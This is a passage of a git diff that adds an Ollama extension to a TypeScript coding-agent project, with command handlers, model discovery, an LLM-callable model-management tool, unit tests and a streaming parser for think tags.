+import * as client from "./ollama-client.js";
+import { discoverModels, formatModelForDisplay } from "./ollama-discovery.js";
+import { formatModelSize } from "./model-capabilities.js";
+
+export function registerOllamaCommands(pi: ExtensionAPI): void {
+	pi.registerCommand("ollama", {
+		description: "Manage local Ollama models — list | pull | remove | ps",
+		async handler(args, ctx) {
+			const parts = (args ?? "").trim().split(/\s+/);
+			const subcommand = parts[0] || "status";
+			const modelArg = parts.slice(1).join(" ");
+
+			switch (subcommand) {
+				case "status":
+					return await handleStatus(ctx);
+				case "list":
+				case "ls":
+					return await handleList(ctx);
+				case "pull":
+					return await handlePull(modelArg, ctx);
+				case "remove":
+				case "rm":
+				case "delete":
+					return await handleRemove(modelArg, ctx);
+				case "ps":
+					return await handlePs(ctx);
+				default:
+					ctx.ui.notify(
+						`Unknown subcommand: ${subcommand}. Use: status, list, pull, remove, ps`,
+						"warning",
+					);
+			}
+		},
+	});
+}
+
+async function handleStatus(ctx: any): Promise<void> {
+	const running = await client.isRunning();
+	if (!running) {
+		ctx.ui.notify(
+			"Ollama is not running. Install from https://ollama.com and run 'ollama serve'",
+			"warning",
+		);
+		return;
+	}
+
+	const version = await client.getVersion();
+	const lines: string[] = [];
+	lines.push(`Ollama${version ? ` v${version}` : ""} — running (${client.getOllamaHost()})`);
+
+	// Show loaded models
+	try {
+		const ps = await client.getRunningModels();
+		if (ps.models && ps.models.length > 0) {
+			lines.push("");
+			lines.push("Loaded:");
+			for (const m of ps.models) {
+				const vram = m.size_vram > 0 ? formatModelSize(m.size_vram) + " VRAM" : "CPU";
+				const expiresAt = new Date(m.expires_at);
+				const idleMs = expiresAt.getTime() - Date.now();
+				const idleMin = Math.max(0, Math.floor(idleMs / 60000));
+				lines.push(`  ${m.name}  ${vram}  expires in ${idleMin}m`);
+			}
+		}
+	} catch {
+		// ps endpoint may not be available on older versions
+	}
+
+	// Show available models
+	try {
+		const models = await discoverModels();
+		if (models.length > 0) {
+			lines.push("");
+			lines.push("Available:");
+			for (const m of models) {
+				lines.push(`  ${formatModelForDisplay(m)}`);
+			}
+		} else {
+			lines.push("");
+			lines.push("No models pulled. Use /ollama pull <model> to get started.");
+		}
+	} catch (err) {
+		lines.push("");
+		lines.push(`Error listing models: ${err instanceof Error ? err.message : String(err)}`);
+	}
+
+	await ctx.ui.custom(
+		(tui: any, theme: any, _kb: any, done: (r: undefined) => void) => {
+			const text = new Text(lines.map((l) => theme.fg("fg", l)).join("\n"), 0, 0);
+			setTimeout(() => done(undefined), 0);
+			return text;
+		},
+	);
+}
+
+async function handleList(ctx: any): Promise<void> {
+	const running = await client.isRunning();
+	if (!running) {
+		ctx.ui.notify("Ollama is not running", "warning");
+		return;
+	}
+
+	const models = await discoverModels();
+	if (models.length === 0) {
+		ctx.ui.notify("No models available. Use /ollama pull <model> to download one.", "info");
+		return;
+	}
+
+	const lines = ["Local Ollama models:", ""];
+	for (const m of models) {
+		lines.push(`  ${formatModelForDisplay(m)}`);
+	}
+
+	await ctx.ui.custom(
+		(tui: any, theme: any, _kb: any, done: (r: undefined) => void) => {
+			const text = new Text(lines.map((l) => theme.fg("fg", l)).join("\n"), 0, 0);
+			setTimeout(() => done(undefined), 0);
+			return text;
+		},
+	);
+}
+
+async function handlePull(modelName: string, ctx: any): Promise<void> {
+	if (!modelName) {
+		ctx.ui.notify("Usage: /ollama pull <model> (e.g. /ollama pull llama3.1:8b)", "warning");
+		return;
+	}
+
+	const running = await client.isRunning();
+	if (!running) {
+		ctx.ui.notify("Ollama is not running", "warning");
+		return;
+	}
+
+	ctx.ui.setWidget("ollama-pull", [`Pulling ${modelName}...`]);
+
+	try {
+		let lastPercent = -1;
+		await client.pullModel(modelName, (progress) => {
+			if (progress.total && progress.completed) {
+				const percent = Math.floor((progress.completed / progress.total) * 100);
+				if (percent !== lastPercent) {
+					lastPercent = percent;
+					const completed = formatModelSize(progress.completed);
+					const total = formatModelSize(progress.total);
+					ctx.ui.setWidget("ollama-pull", [
+						`Pulling ${modelName}... ${percent}% (${completed} / ${total})`,
+					]);
+				}
+			} else if (progress.status) {
+				ctx.ui.setWidget("ollama-pull", [`${modelName}: ${progress.status}`]);
+			}
+		});
+
+		ctx.ui.setWidget("ollama-pull", undefined);
+		ctx.ui.notify(`${modelName} pulled successfully`, "success");
+	} catch (err) {
+		ctx.ui.setWidget("ollama-pull", undefined);
+		ctx.ui.notify(
+			`Failed to pull ${modelName}: ${err instanceof Error ? err.message : String(err)}`,
+			"error",
+		);
+	}
+}
+
+async function handleRemove(modelName: string, ctx: any): Promise<void> {
+	if (!modelName) {
+		ctx.ui.notify("Usage: /ollama remove <model>", "warning");
+		return;
+	}
+
+	const running = await client.isRunning();
+	if (!running) {
+		ctx.ui.notify("Ollama is not running", "warning");
+		return;
+	}
+
+	const confirmed = await ctx.ui.confirm(
+		"Delete model",
+		`Are you sure you want to delete ${modelName}?`,
+	);
+
+	if (!confirmed) return;
+
+	try {
+		await client.deleteModel(modelName);
+		ctx.ui.notify(`${modelName} deleted`, "success");
+	} catch (err) {
+		ctx.ui.notify(
+			`Failed to delete ${modelName}: ${err instanceof Error ? err.message : String(err)}`,
+			"error",
+		);
+	}
+}
+
+async function handlePs(ctx: any): Promise<void> {
+	const running = await client.isRunning();
+	if (!running) {
+		ctx.ui.notify("Ollama is not running", "warning");
+		return;
+	}
+
+	try {
+		const ps = await client.getRunningModels();
+		if (!ps.models || ps.models.length === 0) {
+			ctx.ui.notify("No models currently loaded in memory", "info");
+			return;
+		}
+
+		const lines = ["Running models:", ""];
+		for (const m of ps.models) {
+			const vram = m.size_vram > 0 ? formatModelSize(m.size_vram) + " VRAM" : "CPU only";
+			const totalSize = formatModelSize(m.size);
+			const expiresAt = new Date(m.expires_at);
+			const idleMs = expiresAt.getTime() - Date.now();
+			const idleMin = Math.max(0, Math.floor(idleMs / 60000));
+			lines.push(`  ${m.name}  ${totalSize}  ${vram}  expires in ${idleMin}m`);
+		}
+
+		await ctx.ui.custom(
+			(tui: any, theme: any, _kb: any, done: (r: undefined) => void) => {
+				const text = new Text(lines.map((l) => theme.fg("fg", l)).join("\n"), 0, 0);
+				setTimeout(() => done(undefined), 0);
+				return text;
+			},
+		);
+	} catch (err) {
+		ctx.ui.notify(
+			`Failed to get running models: ${err instanceof Error ? err.message : String(err)}`,
+			"error",
+		);
+	}
+}
diff --git a/src/resources/extensions/ollama/ollama-discovery.ts b/src/resources/extensions/ollama/ollama-discovery.ts
new file mode 100644
index 000000000..29fb1bc77
--- /dev/null
+++ b/src/resources/extensions/ollama/ollama-discovery.ts
@@ -0,0 +1,103 @@
+// GSD2 — Ollama model discovery and capability detection
+
+/**
+ * Discovers locally available Ollama models and enriches them with
+ * capability metadata (context window, vision, reasoning) from the
+ * known model table and /api/show responses.
+ *
+ * Returns models in the format expected by pi.registerProvider().
+ */
+
+import { listModels } from "./ollama-client.js";
+import {
+	estimateContextFromParams,
+	formatModelSize,
+	getModelCapabilities,
+	humanizeModelName,
+} from "./model-capabilities.js";
+import type { OllamaChatOptions, OllamaModelInfo } from "./types.js";
+
+export interface DiscoveredOllamaModel {
+	id: string;
+	name: string;
+	reasoning: boolean;
+	input: ("text" | "image")[];
+	cost: { input: number; output: number; cacheRead: number; cacheWrite: number };
+	contextWindow: number;
+	maxTokens: number;
+	/** Raw size in bytes for display purposes */
+	sizeBytes: number;
+	/** Parameter size string from Ollama (e.g. "7B") */
+	parameterSize: string;
+	/** Ollama-specific inference options for this model */
+	ollamaOptions?: OllamaChatOptions;
+}
+
+const ZERO_COST = { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 };
+
+function enrichModel(info: OllamaModelInfo): DiscoveredOllamaModel {
+	const caps = getModelCapabilities(info.name);
+	const parameterSize = info.details?.parameter_size ?? "";
+
+	// Determine context window: known table > estimate from param size > default
+	const contextWindow =
+		caps.contextWindow ??
+		(parameterSize ? estimateContextFromParams(parameterSize) : 8192);
+
+	// Determine max tokens: known table > fraction of context > default
+	const maxTokens =
+		caps.maxTokens ?? Math.min(Math.floor(contextWindow / 4), 16384);
+
+	// Detect vision from families or known table
+	const hasVision =
+		caps.input?.includes("image") ??
+		(info.details?.families?.some((f) => f === "clip" || f === "mllama") ?? false);
+
+	// Detect reasoning from known table
+	const reasoning = caps.reasoning ?? false;
+
+	return {
+		id: info.name,
+		name: humanizeModelName(info.name),
+		reasoning,
+		input: hasVision ? ["text", "image"] : ["text"],
+		cost: ZERO_COST,
+		contextWindow,
+		maxTokens,
+		sizeBytes: info.size,
+		parameterSize,
+		ollamaOptions: caps.ollamaOptions,
+	};
+}
+
+/**
+ * Discover all locally available Ollama models with enriched capabilities.
+ */
+export async function discoverModels(): Promise<DiscoveredOllamaModel[]> {
+	const tags = await listModels();
+	if (!tags.models || tags.models.length === 0) return [];
+
+	return tags.models.map(enrichModel);
+}
+
+/**
+ * Format a discovered model for display in model list.
+ */
+export function formatModelForDisplay(model: DiscoveredOllamaModel): string {
+	const parts = [model.id];
+
+	if (model.sizeBytes > 0) {
+		parts.push(`(${formatModelSize(model.sizeBytes)})`);
+	}
+
+	const flags: string[] = [];
+	if (model.reasoning) flags.push("reasoning");
+	if (model.input.includes("image")) flags.push("vision");
+
+	if (flags.length > 0) {
+		parts.push(`[${flags.join(", ")}]`);
+	}
+
+	return parts.join(" ");
+}
+
diff --git a/src/resources/extensions/ollama/ollama-tool.ts b/src/resources/extensions/ollama/ollama-tool.ts
new file mode 100644
index 000000000..e3a5d7535
--- /dev/null
+++ b/src/resources/extensions/ollama/ollama-tool.ts
@@ -0,0 +1,287 @@
+// GSD2 — LLM-callable Ollama management tool
+/**
+ * Registers an ollama_manage tool that the LLM can call to interact
+ * with the local Ollama instance — list models, pull new ones, check status.
+ */
+
+import type { ExtensionAPI } from "@gsd/pi-coding-agent";
+import { Text } from "@gsd/pi-tui";
+import { Type } from "@sinclair/typebox";
+import * as client from "./ollama-client.js";
+import { discoverModels, formatModelForDisplay } from "./ollama-discovery.js";
+import { formatModelSize } from "./model-capabilities.js";
+
+interface OllamaToolDetails {
+	action: string;
+	model?: string;
+	modelCount?: number;
+	durationMs: number;
+	error?: string;
+}
+
+export function registerOllamaTool(pi: ExtensionAPI): void {
+	pi.registerTool({
+		name: "ollama_manage",
+		label: "Ollama",
+		description:
+			"Manage local Ollama models. List available models, pull new ones, " +
+			"check Ollama status, or see running models and resource usage. " +
+			"Use this when you need a specific local model that isn't available yet.",
+		promptSnippet: "Manage local Ollama models (list, pull, status, ps)",
+		promptGuidelines: [
+			"Use 'list' to see what models are available locally before trying to use one.",
+			"Use 'pull' to download a model that isn't available yet.",
+			"Use 'remove' to delete a local model that is no longer needed.",
+			"Use 'show' to get detailed info about a model (parameters, quantization, families).",
+			"Use 'status' to check if Ollama is running.",
+			"Use 'ps' to see which models are loaded in memory and VRAM usage.",
+			"Common models: llama3.1:8b, qwen2.5-coder:7b, deepseek-r1:8b, codestral:22b",
+		],
+		parameters: Type.Object({
+			action: Type.Union(
+				[
+					Type.Literal("list"),
+					Type.Literal("pull"),
+					Type.Literal("remove"),
+					Type.Literal("show"),
+					Type.Literal("status"),
+					Type.Literal("ps"),
+				],
+				{ description: "Action to perform" },
+			),
+			model: Type.Optional(
+				Type.String({ description: "Model name (required for pull)" }),
+			),
+		}),
+
+		async execute(_toolCallId, params, signal, onUpdate, _ctx) {
+			const startTime = Date.now();
+			const { action, model } = params;
+
+			try {
+				switch (action) {
+					case "status": {
+						const running = await client.isRunning();
+						if (!running) {
+							return {
+								content: [{ type: "text", text: "Ollama is not running. It needs to be started with 'ollama serve'." }],
+								details: { action, durationMs: Date.now() - startTime } as OllamaToolDetails,
+							};
+						}
+						const version = await client.getVersion();
+						return {
+							content: [{ type: "text", text: `Ollama${version ? ` v${version}` : ""} is running at ${client.getOllamaHost()}` }],
+							details: { action, durationMs: Date.now() - startTime } as OllamaToolDetails,
+						};
+					}
+
+					case "list": {
+						const running = await client.isRunning();
+						if (!running) {
+							return {
+								content: [{ type: "text", text: "Ollama is not running." }],
+								isError: true,
+								details: { action, durationMs: Date.now() - startTime, error: "not_running" } as OllamaToolDetails,
+							};
+						}
+
+						const models = await discoverModels();
+						if (models.length === 0) {
+							return {
+								content: [{ type: "text", text: "No models available. Pull one with action='pull'." }],
+								details: { action, modelCount: 0, durationMs: Date.now() - startTime } as OllamaToolDetails,
+							};
+						}
+
+						const lines = models.map((m) => formatModelForDisplay(m));
+						return {
+							content: [{ type: "text", text: `Available models:\n${lines.join("\n")}` }],
+							details: { action, modelCount: models.length, durationMs: Date.now() - startTime } as OllamaToolDetails,
+						};
+					}
+
+					case "pull": {
+						if (!model) {
+							return {
+								content: [{ type: "text", text: "Error: 'model' parameter is required for pull action." }],
+								isError: true,
+								details: { action, durationMs: Date.now() - startTime, error: "missing_model" } as OllamaToolDetails,
+							};
+						}
+
+						const running = await client.isRunning();
+						if (!running) {
+							return {
+								content: [{ type: "text", text: "Ollama is not running." }],
+								isError: true,
+								details: { action, model, durationMs: Date.now() - startTime, error: "not_running" } as OllamaToolDetails,
+							};
+						}
+
+						let lastStatus = "";
+						await client.pullModel(model, (progress) => {
+							if (progress.total && progress.completed) {
+								const pct = Math.floor((progress.completed / progress.total) * 100);
+								const status = `Pulling ${model}... ${pct}%`;
+								if (status !== lastStatus) {
+									lastStatus = status;
+									onUpdate?.({ content: [{ type: "text", text: status }], details: { action, model, durationMs: Date.now() - startTime } as OllamaToolDetails });
+								}
+							} else if (progress.status && progress.status !== lastStatus) {
+								lastStatus = progress.status;
+								onUpdate?.({ content: [{ type: "text", text: `${model}: ${progress.status}` }], details: { action, model, durationMs: Date.now() - startTime } as OllamaToolDetails });
+							}
+						}, signal);
+
+						return {
+							content: [{ type: "text", text: `Successfully pulled ${model}` }],
+							details: { action, model, durationMs: Date.now() - startTime } as OllamaToolDetails,
+						};
+					}
+
+					case "ps": {
+						const running = await client.isRunning();
+						if (!running) {
+							return {
+								content: [{ type: "text", text: "Ollama is not running." }],
+								isError: true,
+								details: { action, durationMs: Date.now() - startTime, error: "not_running" } as OllamaToolDetails,
+							};
+						}
+
+						const ps = await client.getRunningModels();
+						if (!ps.models || ps.models.length === 0) {
+							return {
+								content: [{ type: "text", text: "No models currently loaded in memory." }],
+								details: { action, modelCount: 0, durationMs: Date.now() - startTime } as OllamaToolDetails,
+							};
+						}
+
+						const lines = ps.models.map((m) => {
+							const vram = m.size_vram > 0 ? `${formatModelSize(m.size_vram)} VRAM` : "CPU";
+							return `${m.name} — ${formatModelSize(m.size)} total, ${vram}`;
+						});
+
+						return {
+							content: [{ type: "text", text: `Loaded models:\n${lines.join("\n")}` }],
+							details: { action, modelCount: ps.models.length, durationMs: Date.now() - startTime } as OllamaToolDetails,
+						};
+					}
+
+					case "remove": {
+						if (!model) {
+							return {
+								content: [{ type: "text", text: "Error: 'model' parameter is required for remove action." }],
+								isError: true,
+								details: { action, durationMs: Date.now() - startTime, error: "missing_model" } as OllamaToolDetails,
+							};
+						}
+
+						const running = await client.isRunning();
+						if (!running) {
+							return {
+								content: [{ type: "text", text: "Ollama is not running." }],
+								isError: true,
+								details: { action, model, durationMs: Date.now() - startTime, error: "not_running" } as OllamaToolDetails,
+							};
+						}
+
+						await client.deleteModel(model);
+						return {
+							content: [{ type: "text", text: `Successfully removed ${model}` }],
+							details: { action, model, durationMs: Date.now() - startTime } as OllamaToolDetails,
+						};
+					}
+
+					case "show": {
+						if (!model) {
+							return {
+								content: [{ type: "text", text: "Error: 'model' parameter is required for show action." }],
+								isError: true,
+								details: { action, durationMs: Date.now() - startTime, error: "missing_model" } as OllamaToolDetails,
+							};
+						}
+
+						const running = await client.isRunning();
+						if (!running) {
+							return {
+								content: [{ type: "text", text: "Ollama is not running." }],
+								isError: true,
+								details: { action, model, durationMs: Date.now() - startTime, error: "not_running" } as OllamaToolDetails,
+							};
+						}
+
+						const info = await client.showModel(model);
+						const details = info.details;
+						const infoLines = [
+							`Model: ${model}`,
+							`Family: ${details.family}`,
+							`Parameters: ${details.parameter_size}`,
+							`Quantization: ${details.quantization_level}`,
+							`Format: ${details.format}`,
+						];
+						if (details.families?.length) {
+							infoLines.push(`Families: ${details.families.join(", ")}`);
+						}
+						if (info.parameters) {
+							infoLines.push(`\nModelfile parameters:\n${info.parameters}`);
+						}
+
+						return {
+							content: [{ type: "text", text: infoLines.join("\n") }],
+							details: { action, model, durationMs: Date.now() - startTime } as OllamaToolDetails,
+						};
+					}
+
+					default:
+						return {
+							content: [{ type: "text", text: `Unknown action: ${action}` }],
+							isError: true,
+							details: { action, durationMs: Date.now() - startTime, error: "unknown_action" } as OllamaToolDetails,
+						};
+				}
+			} catch (err) {
+				const msg = err instanceof Error ? err.message : String(err);
+				return {
+					content: [{ type: "text", text: `Ollama error: ${msg}` }],
+					isError: true,
+					details: { action, model, durationMs: Date.now() - startTime, error: msg } as OllamaToolDetails,
+				};
+			}
+		},
+
+		renderCall(args, theme) {
+			let text = theme.fg("toolTitle", theme.bold("ollama "));
+			text += theme.fg("accent", args.action);
+			if (args.model) {
+				text += theme.fg("dim", ` ${args.model}`);
+			}
+			return new Text(text, 0, 0);
+		},
+
+		renderResult(result, { isPartial, expanded }, theme) {
+			const d = result.details as OllamaToolDetails | undefined;
+
+			if (isPartial) return new Text(theme.fg("warning", "Working..."), 0, 0);
+			if ((result as any).isError || d?.error) {
+				return new Text(theme.fg("error", `Error: ${d?.error ?? "unknown"}`), 0, 0);
+			}
+
+			let text = theme.fg("success", d?.action ?? "done");
+			if (d?.modelCount !== undefined) {
+				text += theme.fg("dim", ` (${d.modelCount} models)`);
+			}
+			text += theme.fg("dim", ` ${d?.durationMs ?? 0}ms`);
+
+			if (expanded) {
+				const content = result.content[0];
+				if (content?.type === "text") {
+					const preview = content.text.split("\n").slice(0, 10).join("\n");
+					text += "\n\n" + theme.fg("dim", preview);
+				}
+			}
+
+			return new Text(text, 0, 0);
+		},
+	});
+}
diff --git a/src/resources/extensions/ollama/tests/model-capabilities.test.ts b/src/resources/extensions/ollama/tests/model-capabilities.test.ts
new file mode 100644
index 000000000..61af68e9b
--- /dev/null
+++ b/src/resources/extensions/ollama/tests/model-capabilities.test.ts
@@ -0,0 +1,162 @@
+// GSD2 — Tests for Ollama model capability detection
+import { describe, it } from "node:test";
+import assert from "node:assert/strict";
+import {
+	getModelCapabilities,
+	estimateContextFromParams,
+	humanizeModelName,
+	formatModelSize,
+} from "../model-capabilities.js";
+
+// ─── getModelCapabilities ────────────────────────────────────────────────────
+
+describe("getModelCapabilities", () => {
+	it("returns reasoning for deepseek-r1 models", () => {
+		const caps = getModelCapabilities("deepseek-r1:8b");
+		assert.equal(caps.reasoning, true);
+		assert.equal(caps.contextWindow, 131072);
+	});
+
+	it("returns reasoning for qwq models", () => {
+		const caps = getModelCapabilities("qwq:32b");
+		assert.equal(caps.reasoning, true);
+	});
+
+	it("returns vision for llava models", () => {
+		const caps = getModelCapabilities("llava:7b");
+		assert.deepEqual(caps.input, ["text", "image"]);
+	});
+
+	it("returns vision for llama3.2-vision models", () => {
+		const caps = getModelCapabilities("llama3.2-vision:11b");
+		assert.deepEqual(caps.input, ["text", "image"]);
+	});
+
+	it("returns correct context for llama3.1", () => {
+		const caps = getModelCapabilities("llama3.1:8b");
+		assert.equal(caps.contextWindow, 131072);
+	});
+
+	it("returns correct context for llama3 (no .1)", () => {
+		const caps = getModelCapabilities("llama3:8b");
+		assert.equal(caps.contextWindow, 8192);
+	});
+
+	it("returns correct context for llama2", () => {
+		const caps = getModelCapabilities("llama2:7b");
+		assert.equal(caps.contextWindow, 4096);
+	});
+
+	it("returns correct context for qwen2.5-coder", () => {
+		const caps = getModelCapabilities("qwen2.5-coder:7b");
+		assert.equal(caps.contextWindow, 131072);
+		assert.equal(caps.maxTokens, 32768);
+	});
+
+	it("returns correct context for codestral", () => {
+		const caps = getModelCapabilities("codestral:22b");
+		assert.equal(caps.contextWindow, 262144);
+	});
+
+	it("returns correct context for mistral-nemo", () => {
+		const caps = getModelCapabilities("mistral-nemo:12b");
+		assert.equal(caps.contextWindow, 131072);
+	});
+
+	it("returns correct context for gemma3", () => {
+		const caps = getModelCapabilities("gemma3:9b");
+		assert.equal(caps.contextWindow, 131072);
+	});
+
+	it("returns empty object for unknown models", () => {
+		const caps = getModelCapabilities("totally-unknown-model:3b");
+		assert.deepEqual(caps, {});
+	});
+
+	it("strips tag before matching", () => {
+		const caps = getModelCapabilities("llama3.1:70b-instruct-q4_0");
+		assert.equal(caps.contextWindow, 131072);
+	});
+
+	it("matches case-insensitively", () => {
+		const caps = getModelCapabilities("Llama3.1:8B");
+		assert.equal(caps.contextWindow, 131072);
+	});
+});
+
+// ─── estimateContextFromParams ───────────────────────────────────────────────
+
+describe("estimateContextFromParams", () => {
+	it("estimates 8192 for small models", () => {
+		assert.equal(estimateContextFromParams("1.5B"), 8192);
+	});
+
+	it("estimates 16384 for 7B models", () => {
+		assert.equal(estimateContextFromParams("7B"), 16384);
+	});
+
+	it("estimates 32768 for 13B models", () => {
+		assert.equal(estimateContextFromParams("13B"), 32768);
+	});
+
+	it("estimates 65536 for 34B models", () => {
+		assert.equal(estimateContextFromParams("34B"), 65536);
+	});
+
+	it("estimates 131072 for 70B+ models", () => {
+		assert.equal(estimateContextFromParams("70B"), 131072);
+	});
+
+	it("handles decimal sizes", () => {
+		assert.equal(estimateContextFromParams("7.5B"), 16384);
+	});
+
+	it("handles M (millions)", () => {
+		assert.equal(estimateContextFromParams("500M"), 8192);
+	});
+
+	it("returns 8192 for unparseable input", () => {
+		assert.equal(estimateContextFromParams("unknown"), 8192);
+	});
+
+	it("returns 8192 for empty string", () => {
+		assert.equal(estimateContextFromParams(""), 8192);
+	});
+});
+
+// ─── humanizeModelName ───────────────────────────────────────────────────────
+
+describe("humanizeModelName", () => {
+	it("capitalizes and adds tag", () => {
+		assert.equal(humanizeModelName("llama3.1:8b"), "Llama 3.1 8B");
+	});
+
+	it("handles latest tag", () => {
+		assert.equal(humanizeModelName("llama3.1:latest"), "Llama 3.1");
+	});
+
+	it("handles no tag", () => {
+		assert.equal(humanizeModelName("llama3.1"), "Llama 3.1");
+	});
+
+	it("handles hyphenated names", () => {
+		const result = humanizeModelName("deepseek-r1:8b");
+		assert.ok(result.includes("8B"));
+	});
+});
+
+// ─── formatModelSize ─────────────────────────────────────────────────────────
+
+describe("formatModelSize", () => {
+	it("formats GB", () => {
+		assert.equal(formatModelSize(4_700_000_000), "4.7 GB");
+	});
+
+	it("formats MB", () => {
+		assert.equal(formatModelSize(500_000_000), "500.0 MB");
+	});
+
+	it("formats KB", () => {
+		assert.equal(formatModelSize(500_000), "500 KB");
+	});
+});
diff --git a/src/resources/extensions/ollama/tests/ollama-chat-provider-stream.test.ts b/src/resources/extensions/ollama/tests/ollama-chat-provider-stream.test.ts
new file mode 100644
index 000000000..bc3982c6e
--- /dev/null
+++ b/src/resources/extensions/ollama/tests/ollama-chat-provider-stream.test.ts
@@ -0,0 +1,82 @@
+// GSD2 — Regression test: Ollama streaming must not drop content on done:true chunks (#3576)
+// Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+
+import { describe, it } from "node:test";
+import assert from "node:assert/strict";
+
+/**
+ * This test validates the streaming logic pattern used in ollama-chat-provider.ts.
+ * The bug: content on the terminal done:true chunk was silently dropped because
+ * the stream loop only emitted content when `!chunk.done`.
+ *
+ * The fix: process chunk.message.content regardless of chunk.done, then handle
+ * done metadata. This test exercises that logic path with a simulated chunk stream.
+ */
+
+interface OllamaChunk {
+  done: boolean;
+  done_reason?: string;
+  message?: { content?: string; tool_calls?: unknown[] };
+  prompt_eval_count?: number;
+  eval_count?: number;
+}
+
+function simulateStreamLoop(chunks: OllamaChunk[]): string {
+  let output = "";
+
+  for (const chunk of chunks) {
+    // This mirrors the fixed logic in ollama-chat-provider.ts
+    const content = chunk.message?.content ?? "";
+    if (content) {
+      output += content;
+    }
+
+    if (chunk.done) {
+      break;
+    }
+  }
+
+  return output;
+}
+
+describe("Ollama stream terminal chunk handling", () => {
+  it("captures content from done:true chunk", () => {
+    const chunks: OllamaChunk[] = [
+      { done: false, message: { content: "Hello " } },
+      { done: false, message: { content: "world" } },
+      { done: true, done_reason: "stop", message: { content: "!" } },
+    ];
+
+    const result = simulateStreamLoop(chunks);
+    assert.equal(result, "Hello world!", "trailing content on done chunk must not be dropped");
+  });
+
+  it("works when done chunk has no content", () => {
+    const chunks: OllamaChunk[] = [
+      { done: false, message: { content: "Hello" } },
+      { done: true, done_reason: "stop", message: {} },
+    ];
+
+    const result = simulateStreamLoop(chunks);
+    assert.equal(result, "Hello");
+  });
+
+  it("works when done chunk has empty string content", () => {
+    const chunks: OllamaChunk[] = [
+      { done: false, message: { content: "data" } },
+      { done: true, done_reason: "stop", message: { content: "" } },
+    ];
+
+    const result = simulateStreamLoop(chunks);
+    assert.equal(result, "data");
+  });
+
+  it("handles single done chunk with content", () => {
+    const chunks: OllamaChunk[] = [
+      { done: true, done_reason: "stop", message: { content: "one-shot" } },
+    ];
+
+    const result = simulateStreamLoop(chunks);
+    assert.equal(result, "one-shot", "single done chunk with content should work");
+  });
+});
diff --git a/src/resources/extensions/ollama/tests/ollama-client.test.ts b/src/resources/extensions/ollama/tests/ollama-client.test.ts
new file mode 100644
index 000000000..0deae397a
--- /dev/null
+++ b/src/resources/extensions/ollama/tests/ollama-client.test.ts
@@ -0,0 +1,38 @@
+// GSD2 — Tests for Ollama HTTP client
+import { describe, it, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { getOllamaHost } from "../ollama-client.js";
+
+// ─── getOllamaHost ──────────────────────────────────────────────────────────
+
+describe("getOllamaHost", () => {
+	const originalHost = process.env.OLLAMA_HOST;
+
+	afterEach(() => {
+		if (originalHost === undefined) {
+			delete process.env.OLLAMA_HOST;
+		} else {
+			process.env.OLLAMA_HOST = originalHost;
+		}
+	});
+
+	it("returns default when OLLAMA_HOST is not set", () => {
+		delete process.env.OLLAMA_HOST;
+		assert.equal(getOllamaHost(), "http://localhost:11434");
+	});
+
+	it("returns OLLAMA_HOST when set with scheme", () => {
+		process.env.OLLAMA_HOST = "http://myhost:12345";
+		assert.equal(getOllamaHost(), "http://myhost:12345");
+	});
+
+	it("adds http:// when OLLAMA_HOST has no scheme", () => {
+		process.env.OLLAMA_HOST = "myhost:12345";
+		assert.equal(getOllamaHost(), "http://myhost:12345");
+	});
+
+	it("preserves https:// scheme", () => {
+		process.env.OLLAMA_HOST = "https://secure-ollama.example.com";
+		assert.equal(getOllamaHost(), "https://secure-ollama.example.com");
+	});
+});
diff --git a/src/resources/extensions/ollama/tests/ollama-discovery.test.ts b/src/resources/extensions/ollama/tests/ollama-discovery.test.ts
new file mode 100644
index 000000000..a228bf663
--- /dev/null
+++ b/src/resources/extensions/ollama/tests/ollama-discovery.test.ts
@@ -0,0 +1 @@
+// GSD2 — Tests for Ollama model discovery and enrichment
diff --git a/src/resources/extensions/ollama/thinking-parser.ts b/src/resources/extensions/ollama/thinking-parser.ts
new file mode 100644
index 000000000..9c060761c
--- /dev/null
+++ b/src/resources/extensions/ollama/thinking-parser.ts
@@ -0,0 +1,116 @@
+// GSD2 — Ollama Extension: Stateful <think> tag stream parser
+
+/**
+ * Extracts <think>...</think> thinking blocks from a streaming text response.
+ * Handles the case where tag boundaries span multiple chunks by buffering
+ * up to 8 characters (length of "</think>") at chunk boundaries.
+ *
+ * Used for reasoning models like deepseek-r1 and qwq that embed thinking
+ * inline in their text output.
+ */
+
+export type ParsedChunk =
+	| { type: "thinking"; text: string }
+	| { type: "text"; text: string };
+
+const OPEN_TAG = "<think>";
+const CLOSE_TAG = "</think>";
+const MAX_TAG_LEN = Math.max(OPEN_TAG.length, CLOSE_TAG.length);
+
+export class ThinkingTagParser {
+	private buffer = "";
+	private inThinking = false;
+
+	/**
+	 * Feed a chunk of text and get back parsed segments.
+	 * May return zero or more segments depending on tag boundaries.
+	 */
+	push(chunk: string): ParsedChunk[] {
+		const results: ParsedChunk[] = [];
+		let input = this.buffer + chunk;
+		this.buffer = "";
+
+		while (input.length > 0) {
+			if (this.inThinking) {
+				const closeIdx = input.indexOf(CLOSE_TAG);
+				if (closeIdx !== -1) {
+					// Found close tag — emit thinking content before it
+					const thinking = input.slice(0, closeIdx);
+					if (thinking) results.push({ type: "thinking", text: thinking });
+					this.inThinking = false;
+					input = input.slice(closeIdx + CLOSE_TAG.length);
+				} else if (this.couldBePartialTag(input, CLOSE_TAG)) {
+					// Possible partial close tag at end — buffer only the matching tail
+					const tailLen = this.getPartialTagTailLength(input, CLOSE_TAG);
+					const safe = input.slice(0, input.length - tailLen);
+					if (safe) results.push({ type: "thinking", text: safe });
+					this.buffer = input.slice(-tailLen);
+					break;
+				} else {
+					// No close tag — emit all as thinking
+					results.push({ type: "thinking", text: input });
+					break;
+				}
+			} else {
+				const openIdx = input.indexOf(OPEN_TAG);
+				if (openIdx !== -1) {
+					// Found open tag — emit text before it
+					const text = input.slice(0, openIdx);
+					if (text) results.push({ type: "text", text });
+					this.inThinking = true;
+					input = input.slice(openIdx + OPEN_TAG.length);
+				} else if (this.couldBePartialTag(input, OPEN_TAG)) {
+					// Possible partial open tag at end — buffer only the matching tail
+					const tailLen = this.getPartialTagTailLength(input, OPEN_TAG);
+					const safe = input.slice(0, input.length - tailLen);
+					if (safe) results.push({ type: "text", text: safe });
+					this.buffer = input.slice(-tailLen);
+					break;
+				} else {
+					// No open tag — emit all as text
+					results.push({ type: "text", text: input });
+					break;
+				}
+			}
+		}
+
+		return results;
+	}
+
+	/**
+	 * Flush any remaining buffered content. Call at end of stream.
+	 */
+	flush(): ParsedChunk[] {
